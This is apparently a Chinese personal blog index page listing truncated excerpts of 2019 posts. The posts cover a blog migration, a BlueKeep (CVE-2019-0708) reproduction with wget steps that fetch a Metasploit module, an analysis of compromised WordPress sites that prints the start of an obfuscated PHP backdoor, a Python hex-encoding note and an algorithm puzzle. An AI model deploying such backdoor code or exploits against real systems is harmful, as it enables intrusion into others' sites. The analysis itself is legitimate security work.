Wednesday, September 25, 2019

博客从Github Page移植到了Blogspot

为什么要移植 一直用hexo托管在Github上有几点体验不要好的地方 没有评论系统,虽然有很多插件,但是不能及时的通知提醒 写博客体验比较不好,虽说这种方式比较极客,Markdown本身语法比较简单,有些复杂的排版需要用html标签来实现,比较难受 没有后台管理系统,全靠git来管理,方式较极客,但不友好 更新博客之后需要刷新两次才能更新页面 综上,当时跟风的我现在苦逼的将博客全手工移植到来这里,😢 ...

Saturday, September 7, 2019

CVE-2019-0708漏洞复现

具体PR: https://github.com/rapid7/metasploit-framework/pull/12283 准备操作 Linux 直接看 http://blog.xkkhh.cn/archives/535 MacOS 1 2 3 4 5 6 7 8 9 10 11 # Download wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget...

Friday, August 9, 2019

超过35000个WordPress站被攻破事件分析

一开始看到了 https://www.v2ex.com/t/588483 这个帖子 找到了 https://twitter.com/blackorbird/status/1158377821963575296 🐎 1 <?php goto D242; Cfc5: echo "\x61\x75\x78\x36\x54\150\x65\151\157\x47\150\165\x65\x51\x75\63"; goto e83e; f7cc: B487: goto d892; Ff02: chmod($C43e, 0755); goto b30d;...

Tuesday, August 6, 2019

Python字符串十六进制编码的破事

刚才做ctf题目发现这种十六进制编码还是挺烦的, 整理一下思绪 1 2 string <-> hex string string <-> dec integer 彻底解决这些烦人的玩意 string <-> hex string hex string">string -> hex string 1 2 3 4 5 6 # all python version import binascii binascii.b2a_hex('string') binascii.hexlify('string') # only python2 'string'.encode('hex') a class="headerlink" href="https://comwrg.github.io/2019/08/06/string-to-hex-using-python/#string-lt-hex-string"...

Thursday, May 16, 2019

算法题-BAT最小交换次数

题目 IT产业人才需求节节攀升。业内巨头百度、阿里巴巴、腾讯(简称BAT)在某海滩进行招聘活动。 招聘部门一字排开。由于是自由抢占席位,三大公司的席位随机交错在一起,形如: ABABTATT,这使得应聘者十分别扭。 于是,管理部门要求招聘方进行必要的交换位置,使得每个集团的席位都挨在一起。即最后形如: BBAAATTT 这样的形状,当然,也可能是: AAABBTTT 等。 现在,假设每次只能交换2个席位,并且知道现在的席位分布, 你的任务是计算:要使每个集团的招聘席位都挨在一起需要至少进行多少次交换动作。 输入是一行n个字符(只含有字母B、A或T),表示现在的席位分布。 输出是一个整数,表示至少交换次数。 比如,输入: TABTABBTTTT 程序应该输出: 3 再比如,输入: TTAAABB 程序应该输出: 0 我们约定,输入字符串的长度n 不大于10万 资源约定: 峰值内存消耗(含虚拟机)...